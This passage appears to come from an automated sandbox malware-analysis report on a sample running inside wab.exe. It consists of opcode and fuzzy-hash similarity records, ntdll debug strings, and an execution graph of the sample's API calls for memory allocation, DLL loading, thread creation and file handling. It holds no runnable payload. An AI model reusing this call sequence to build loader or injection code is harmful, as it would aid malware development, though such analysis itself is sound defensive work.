                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f6a9665cd7ff694838eb70c69415897017774ade40081477215b670a5d9c5404
                                                  • Instruction ID: 21163a34af685b47e591d953d98d84a44c4997c94aad095e58a56f785a92d393
                                                  • Opcode Fuzzy Hash: f6a9665cd7ff694838eb70c69415897017774ade40081477215b670a5d9c5404
                                                  • Instruction Fuzzy Hash: E8900231606810129680B158488595A500997E1301B96C011F0424624C8B14CA675362
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d873142e6edfe69b5288d1eb8d7bc48ca3fedc15316151a5c333561392ca8bc5
                                                  • Instruction ID: 93ebde7619f76bd5ae523c4da68bb2ec7f008d3cd35ff525496ed3495c5cee0d
                                                  • Opcode Fuzzy Hash: d873142e6edfe69b5288d1eb8d7bc48ca3fedc15316151a5c333561392ca8bc5
                                                  • Instruction Fuzzy Hash: A990022124241802D680B1588415B1B100AC7D1601F96C011B0024624D8716CA7666B2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dc6b3c82004fccdcb638e5b326d67d7b44643e0ad84c7d9c303907432356b513
                                                  • Instruction ID: 788890a32a2961adab23485b3997fc4760238db6fb4a063d1287c26a2c497d32
                                                  • Opcode Fuzzy Hash: dc6b3c82004fccdcb638e5b326d67d7b44643e0ad84c7d9c303907432356b513
                                                  • Instruction Fuzzy Hash: 7690022120285442D680B2584805F1F510987E2202FD6C019B4156624CCA15C9665722
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                  • Instruction ID: cdbd6941dabb5eedc086cfd0386c633877f73f0dce053e38c4158c3927e0601d
                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                  • Instruction Fuzzy Hash:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 681 1fde2890-1fde28b3 682 1fde28b9-1fde28cc 681->682 683 1fe1a4bc-1fe1a4c0 681->683 685 1fde28ce-1fde28d7 682->685 686 1fde28dd-1fde28df 682->686 683->682 684 1fe1a4c6-1fe1a4ca 683->684 684->682 687 1fe1a4d0-1fe1a4d4 684->687 685->686 688 1fe1a57e-1fe1a585 685->688 689 1fde28e1-1fde28e5 686->689 687->682 692 1fe1a4da-1fe1a4de 687->692 688->686 690 1fde28eb-1fde28fa 689->690 691 1fde2988-1fde298e 689->691 693 1fe1a58a-1fe1a58d 690->693 694 1fde2900-1fde2905 690->694 695 1fde2908-1fde290c 691->695 692->682 696 1fe1a4e4-1fe1a4eb 692->696 693->695 694->695 695->689 697 1fde290e-1fde291b 695->697 698 1fe1a564-1fe1a56c 696->698 699 1fe1a4ed-1fe1a4f4 696->699 700 1fe1a592-1fe1a599 697->700 701 1fde2921 697->701 698->682 702 1fe1a572-1fe1a576 698->702 703 1fe1a4f6-1fe1a4fe 699->703 704 1fe1a50b 699->704 713 1fe1a5a1-1fe1a5c9 call 1fdf0050 700->713 706 1fde2924-1fde2926 701->706 702->682 707 1fe1a57c call 1fdf0050 702->707 703->682 708 1fe1a504-1fe1a509 703->708 705 1fe1a510-1fe1a536 call 1fdf0050 704->705 721 1fe1a55d-1fe1a55f 705->721 710 1fde2928-1fde292a 706->710 711 1fde2993-1fde2995 706->711 707->721 708->705 717 1fde292c-1fde292e 710->717 718 1fde2946-1fde2966 call 1fdf0050 710->718 711->710 715 1fde2997-1fde29b1 call 1fdf0050 711->715 730 1fde2969-1fde2974 715->730 717->718 724 1fde2930-1fde2944 call 1fdf0050 717->724 718->730 727 1fde2981-1fde2985 721->727 724->718 730->706 732 1fde2976-1fde2979 730->732 732->713 733 1fde297f 732->733 733->727
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                  • API String ID: 48624451-2108815105
                                                  • Opcode ID: c614a77146b930b49b7b1e1adaf4e2072dde74e8ac04f317545af88712f01e08
                                                  • Instruction ID: be97e419612d743b4f81a0c4ca0a62a7f8667ee99a6c6a921be5d48882385cb4
                                                  • Opcode Fuzzy Hash: c614a77146b930b49b7b1e1adaf4e2072dde74e8ac04f317545af88712f01e08
                                                  • Instruction Fuzzy Hash: AB51E9B6E04256AFCB50DFA88C9097EF7B8BB083057508229E498D7642D734EE40C7E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 938 1fdd7630-1fdd7651 939 1fdd768b-1fdd7699 call 1fde4c30 938->939 940 1fdd7653-1fdd766f call 1fdae660 938->940 945 1fdd7675-1fdd7682 940->945 946 1fe14638 940->946 947 1fdd769a-1fdd76a9 call 1fdd7818 945->947 948 1fdd7684 945->948 950 1fe1463f-1fe14645 946->950 954 1fdd76ab-1fdd76c1 call 1fdd77cd 947->954 955 1fdd7701-1fdd770a 947->955 948->939 952 1fdd76c7-1fdd76d0 call 1fdd7728 950->952 953 1fe1464b-1fe146b8 call 1fe2f290 call 1fde9020 BaseQueryModuleData 950->953 952->955 965 1fdd76d2 952->965 953->952 975 1fe146be-1fe146c6 953->975 954->950 954->952 958 1fdd76d8-1fdd76e1 955->958 962 1fdd770c-1fdd770e 958->962 963 1fdd76e3-1fdd76f2 call 1fdd771b 958->963 969 1fdd76f4-1fdd76f6 962->969 963->969 965->958 971 1fdd76f8-1fdd76fa 969->971 972 1fdd7710-1fdd7719 969->972 971->948 974 1fdd76fc 971->974 972->971 976 1fe147be-1fe147d0 call 1fde2c50 974->976 975->952 977 1fe146cc-1fe146d3 975->977 976->948 977->952 980 1fe146d9-1fe146e4 977->980 981 1fe147b9 call 1fde4d48 980->981 982 1fe146ea-1fe14723 call 1fe2f290 call 1fdeaaa0 980->982 981->976 988 1fe14725-1fe14736 call 1fe2f290 982->988 989 1fe1473b-1fe1476b call 1fe2f290 982->989 988->955 989->952 994 1fe14771-1fe1477f call 1fdea770 989->994 997 1fe14781-1fe14783 994->997 998 1fe14786-1fe147a3 call 1fe2f290 call 1fe1cf9e 994->998 997->998 998->952 1003 1fe147a9-1fe147b2 998->1003 1003->994 1004 1fe147b4 1003->1004 1004->952
                                                  Strings
                                                  • Execute=1, xrefs: 1FE14713
                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1FE14655
                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 1FE14787
                                                  • ExecuteOptions, xrefs: 1FE146A0
                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1FE14742
                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1FE14725
                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1FE146FC
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                  • API String ID: 0-484625025
                                                  • Opcode ID: 819f86c7dafd5e760387a73a7c7885f3fd92ab1fda7e534f9b5e9c7c251f79bd
                                                  • Instruction ID: 1fc51c12597a06c4a918fb8a43e45a843515acbe622a3f7e0a5378ec4bbf81e0
                                                  • Opcode Fuzzy Hash: 819f86c7dafd5e760387a73a7c7885f3fd92ab1fda7e534f9b5e9c7c251f79bd
                                                  • Instruction Fuzzy Hash: 22512635A00399BBDF909AA5DC84FFD77A8BF05300F1105E9E505AB1C1F771AA498B60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID: __aulldvrm
                                                  • String ID: +$-$0$0
                                                  • API String ID: 1302938615-699404926
                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                  • Instruction ID: a6930ae0aa79570de7c4baacc86c60f145fe389b9ae1f0430ea9e236f074bcb2
                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                  • Instruction Fuzzy Hash: 7381AF74E0534A8FDB859F64C8917FEBBB2AF45310F18425AD891AB7A2D734B850CB70
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  • RTL: Re-Waiting, xrefs: 1FE1031E
                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 1FE102BD
                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 1FE102E7
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                  • API String ID: 0-2474120054
                                                  • Opcode ID: 2f2bf06ddd51259ce83eb53833c1fe9fecc8b010873305831b66904d89d9cbe5
                                                  • Instruction ID: e411d36bf7a46aef5345270478189e626bf02c1fa669dc1cf42c0b1fb9e4481c
                                                  • Opcode Fuzzy Hash: 2f2bf06ddd51259ce83eb53833c1fe9fecc8b010873305831b66904d89d9cbe5
                                                  • Instruction Fuzzy Hash: E2E1C074608741DFD751CF29C880BAABBE0BF84324F100A9DF5A58B2D1E774E946CB62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  • RTL: Re-Waiting, xrefs: 1FE17BAC
                                                  • RTL: Resource at %p, xrefs: 1FE17B8E
                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 1FE17B7F
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                  • API String ID: 0-871070163
                                                  • Opcode ID: c7a564f4340763e2bbd8a8def2097ba9b13c7801e28b2f37063cfbe72412f4bc
                                                  • Instruction ID: feb02fb0f1702c33ba5dcd5dd45a85d2fa60111f3fb789ad6346839712a11623
                                                  • Opcode Fuzzy Hash: c7a564f4340763e2bbd8a8def2097ba9b13c7801e28b2f37063cfbe72412f4bc
                                                  • Instruction Fuzzy Hash: 6041C2357047429FC760CE25CC40B6AB7E5EF89715F140A2DF9969B680EB31F4058B91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1FE1728C
                                                  Strings
                                                  • RTL: Re-Waiting, xrefs: 1FE172C1
                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 1FE17294
                                                  • RTL: Resource at %p, xrefs: 1FE172A3
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                  • API String ID: 885266447-605551621
                                                  • Opcode ID: 54b56341e424de2af219eea51a07dc21e005c4b743db26f7398069833f4dd4d4
                                                  • Instruction ID: f261185e1961ecafefa7a3ca2caa690e90556d74fca9279567471cb372fa7a4d
                                                  • Opcode Fuzzy Hash: 54b56341e424de2af219eea51a07dc21e005c4b743db26f7398069833f4dd4d4
                                                  • Instruction Fuzzy Hash: 8B41F376744346ABD710CE25CC41FA6B7A5FF84B18F140619F994AB280EB31F846C7E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID: __aulldvrm
                                                  • String ID: +$-
                                                  • API String ID: 1302938615-2137968064
                                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                  • Instruction ID: 219f857442ef3a3ab247f49b7c6ce98daf0ad41342724eaef62b2ab6ff73b10f
                                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                  • Instruction Fuzzy Hash: 8C91A374E003569BDBD4CE69C881AFEB7A5FF44720F12471AE9B5E72C2E734A9408760
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $$@
                                                  • API String ID: 0-1194432280
                                                  • Opcode ID: bb755332f36e3392989fdf0c1427611228378f4c3bf8deef0e140af4d0ea09a5
                                                  • Instruction ID: 90da533c61b7dfca6ced822304a7a4beaeeb0c78b01b4f1288dd28917947356e
                                                  • Opcode Fuzzy Hash: bb755332f36e3392989fdf0c1427611228378f4c3bf8deef0e140af4d0ea09a5
                                                  • Instruction Fuzzy Hash: 35814E76D002699BDB61DF54CC44BEEB7B4AF09710F0045EAE90AB7280E7315E84CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:3.5%
                                                  Dynamic/Decrypted Code Coverage:3.7%
                                                  Signature Coverage:1.9%
                                                  Total number of Nodes:536
                                                  Total number of Limit Nodes:78
                                                  execution_graph 75104 2d06290 75105 2d062ba 75104->75105 75108 2d071b0 75105->75108 75107 2d062e1 75109 2d071cd 75108->75109 75115 2d16fa0 75109->75115 75111 2d0721d 75112 2d07224 75111->75112 75120 2d17080 75111->75120 75112->75107 75114 2d0724d 75114->75107 75116 2d17033 75115->75116 75117 2d16fc7 75115->75117 75125 34b2f30 LdrInitializeThunk 75116->75125 75117->75111 75118 2d1706c 75118->75111 75121 2d17122 75120->75121 75122 2d170a4 75120->75122 75126 34b2d10 LdrInitializeThunk 75121->75126 75122->75114 75123 2d17167 75123->75114 75125->75118 75126->75123 74861 2d10650 74862 2d1066c 74861->74862 74863 2d10694 74862->74863 74864 2d106a8 74862->74864 74865 2d17830 NtClose 74863->74865 74871 2d17830 74864->74871 74867 2d1069d 74865->74867 74868 2d106b1 74874 2d19810 RtlAllocateHeap 74868->74874 74870 2d106bc 74872 2d1784d 74871->74872 74873 2d1785e NtClose 74872->74873 74873->74868 74874->74870 75127 2d16810 75128 2d1682d 75127->75128 75129 2d1683e RtlDosPathNameToNtPathName_U 75128->75129 75130 2d14810 75131 2d1486a 75130->75131 75132 2d14877 75131->75132 75134 2d123b0 75131->75134 75135 2d19660 NtAllocateVirtualMemory 75134->75135 75137 2d123f1 75135->75137 75136 2d124f6 75136->75132 75137->75136 75138 2d03cc0 LdrLoadDll 75137->75138 75140 2d12437 75138->75140 75139 2d12470 Sleep 75139->75140 75140->75136 75140->75139 75141 2d17790 75142 2d177ff 75141->75142 75144 2d177b7 75141->75144 75143 2d17815 NtDeleteFile 75142->75143 75145 2d0e780 75146 2d0e7e4 75145->75146 75147 2d057e0 2 API calls 75146->75147 75149 2d0e90d 75147->75149 75148 2d0e914 75149->75148 75150 2d058f0 LdrInitializeThunk 75149->75150 75151 2d0e990 75150->75151 75152 2d155a0 RtlFreeHeap 75151->75152 75173 2d0eab3 75151->75173 75153 2d0e9ad 75152->75153 75154 2d0eac2 75153->75154 75176 2d0e560 75153->75176 75155 2d17830 NtClose 75154->75155 75157 2d0eacc 75155->75157 75158 2d0e9c5 75158->75154 75159 2d0e9d0 75158->75159 75185 2d197d0 75159->75185 75161 2d0e9f9 75162 2d0ea02 75161->75162 75163 2d0ea18 75161->75163 75164 2d17830 NtClose 75162->75164 75188 2d0e450 CoInitialize 75163->75188 75167 2d0ea0c 75164->75167 75166 2d0ea26 75168 2d17310 LdrInitializeThunk 75166->75168 75174 2d0ea44 75168->75174 75169 2d0eaa2 75170 2d17830 NtClose 75169->75170 75171 2d0eaac 75170->75171 75172 2d196f0 RtlFreeHeap 75171->75172 75172->75173 75174->75169 75175 2d17310 LdrInitializeThunk 75174->75175 75175->75174 75177 2d0e57c 75176->75177 75178 2d03cc0 LdrLoadDll 75177->75178 75180 2d0e59a 75178->75180 75179 2d0e5a3 75179->75158 75180->75179 75181 2d03cc0 LdrLoadDll 75180->75181 75182 2d0e66e 75181->75182 75183 2d03cc0 LdrLoadDll 75182->75183 75184 2d0e6c8 75182->75184 75183->75184 75184->75158 75190 2d17b40 75185->75190 75187 2d197eb 75187->75161 75189 2d0e4b5 75188->75189 75189->75166 75191 2d17b5a 75190->75191 75192 2d17b6b RtlAllocateHeap 75191->75192 75192->75187 75193 2d00300 75194 2d00319 75193->75194 75195 2d03cc0 LdrLoadDll 75194->75195 75196 2d00337 75195->75196 75197 2d00383 75196->75197 75198 2d00370 PostThreadMessageW 75196->75198 75198->75197 74880 2d14240 74881 2d1429d 74880->74881 74882 2d142d8 74881->74882 74885 2d102f0 74881->74885 74884 2d142ba 74886 2d10308 74885->74886 74887 2d10294 74885->74887 74888 2d17830 NtClose 74887->74888 74889 2d102d4 74888->74889 74889->74884 74890 2d17540 74891 2d175ef 74890->74891 74893 2d1756b 74890->74893 74892 2d17605 NtCreateFile 74891->74892 75199 2d16d00 75200 2d16d87 75199->75200 75202 2d16d27 75199->75202 75204 34b2ee0 LdrInitializeThunk 75200->75204 75201 2d16db8 75204->75201 75205 2d05205 75206 2d051b3 75205->75206 75206->75205 75211 2d04ff3 75206->75211 75217 2d05088 75206->75217 75221 2d05000 75206->75221 75207 2d0520e 75212 2d05001 75211->75212 75216 2d0504b 75211->75216 75226 2d16eb0 75212->75226 75216->75207 75218 2d0502e 75217->75218 75218->75217 75219 2d0504b 75218->75219 75220 2d178c0 LdrInitializeThunk 75218->75220 75219->75207 75220->75219 75222 2d05036 75221->75222 75223 2d16eb0 LdrInitializeThunk 75221->75223 75224 2d178c0 LdrInitializeThunk 75222->75224 75223->75222 75225 2d0504b 75224->75225 75225->75207 75227 2d16ecd 75226->75227 75235 34b2c0a 75227->75235 75228 2d05036 75230 2d178c0 75228->75230 75231 2d17944 75230->75231 75233 2d178e4 75230->75233 75238 34b2e80 LdrInitializeThunk 75231->75238 75232 2d17975 75232->75216 75233->75216 75236 34b2c1f LdrInitializeThunk 75235->75236 75237 34b2c11 75235->75237 75236->75228 75237->75228 75238->75232 75239 2d01f88 75240 2d057e0 2 API calls 75239->75240 75241 2d01fb0 75240->75241 74894 34b2ad0 LdrInitializeThunk 74895 2cf92d0 74896 2cf92df 74895->74896 74897 2cf9320 74896->74897 74898 2cf930d CreateThread 74896->74898 74899 2d04f70 74904 2d07380 74899->74904 74902 2d04fa0 74903 2d04fcc 74902->74903 74908 2d07300 74902->74908 74905 2d07393 74904->74905 74915 2d16dc0 74905->74915 74907 2d073be 74907->74902 74909 2d07344 74908->74909 74910 2d07365 74909->74910 74921 2d16bc0 74909->74921 74910->74902 74912 2d07355 74913 2d07371 74912->74913 74914 2d17830 NtClose 74912->74914 74913->74902 74914->74910 74916 2d16e33 74915->74916 74918 2d16de4 74915->74918 74920 34b2dd0 LdrInitializeThunk 74916->74920 74917 2d16e58 74917->74907 74918->74907 74920->74917 74922 2d16c32 74921->74922 74923 2d16be4 74921->74923 74926 34b4650 LdrInitializeThunk 74922->74926 74923->74912 74924 2d16c57 74924->74912 74926->74924 75242 2d0b6b0 75244 2d0b6d9 75242->75244 75243 2d0b7dd 75244->75243 75245 2d0b783 FindFirstFileW 75244->75245 75245->75243 75246 2d0b79e 75245->75246 75247 2d0b7c4 FindNextFileW 75246->75247 75247->75246 75248 2d0b7d6 FindClose 75247->75248 75248->75243 75249 2d1a830 75250 2d196f0 RtlFreeHeap 75249->75250 75251 2d1a845 75250->75251 75252 2d07a32 75253 2d07a3c 75252->75253 75254 2d07a22 75253->75254 75256 2d064b0 LdrInitializeThunk LdrInitializeThunk 75253->75256 75256->75254 74939 2d028fc 74944 2d07000 74939->74944 74942 2d02921 74943 2d17830 NtClose 74943->74942 74945 2d0701a 74944->74945 74949 2d0290c 74944->74949 74950 2d16f50 74945->74950 74948 2d17830 NtClose 74948->74949 74949->74942 74949->74943 74951 2d16f6d 74950->74951 74954 34b35c0 LdrInitializeThunk 74951->74954 74952 2d070ea 74952->74948 74954->74952 74955 2cface0 74957 2cfc351 74955->74957 74958 2d19660 74955->74958 74961 2d17980 74958->74961 74960 2d19691 74960->74957 74962 2d17a0a 74961->74962 74964 2d179a4 74961->74964 74963 2d17a20 NtAllocateVirtualMemory 74962->74963 74963->74960 74964->74960 74965 2d0eae0 74966 2d0eaf1 74965->74966 74968 2d15b70 74965->74968 74969 2d15bcd 74968->74969 74970 2d15bfc 74969->74970 74973 2d0c9a0 74969->74973 74970->74966 74972 2d15bde 74972->74966 74975 2d0c98b 74973->74975 74974 2d0cb4d 74974->74972 74975->74972 74975->74973 74975->74974 74978 2d196f0 74975->74978 74981 2d17b90 74978->74981 74980 2d0cbc6 74980->74972 74982 2d17bad 74981->74982 74983 2d17bbe RtlFreeHeap 74982->74983 74983->74980 74984 2d08e60 74985 2d08e67 74984->74985 74985->74984 74986 2d08e88 74985->74986 74987 2d196f0 RtlFreeHeap 74985->74987 74987->74986 74988 2d0f060 74989 2d0f07d 74988->74989 74994 2d03cc0 74989->74994 74991 2d0f09b 74993 2d0f21a 74991->74993 74998 2d155a0 74991->74998 74995 2d03ce4 74994->74995 74996 2d03d20 LdrLoadDll 74995->74996 74997 2d03ceb 74995->74997 74996->74997 74997->74991 74999 2d155fd 74998->74999 75000 2d15630 74999->75000 75003 2d0f340 RtlFreeHeap 74999->75003 75000->74993 75002 2d15612 75002->74993 75003->75002 75004 2d06660 75005 2d0667c 75004->75005 75006 2d066cf 75004->75006 75005->75006 75008 2d17830 NtClose 75005->75008 75007 2d067ec 75006->75007 75014 2d05a70 75006->75014 75009 2d06697 75008->75009 75012 2d05a70 3 API calls 75009->75012 75011 2d067cf 75011->75007 75029 2d05c40 75011->75029 75012->75006 75015 2d05a9c 75014->75015 75055 2d058f0 75015->75055 75018 2d05b85 75018->75011 75020 2d05b7c 75021 2d17830 NtClose 75020->75021 75021->75018 75022 2d05b0d 75022->75020 75023 2d17310 LdrInitializeThunk 75022->75023 75024 2d05b91 75022->75024 75023->75022 75025 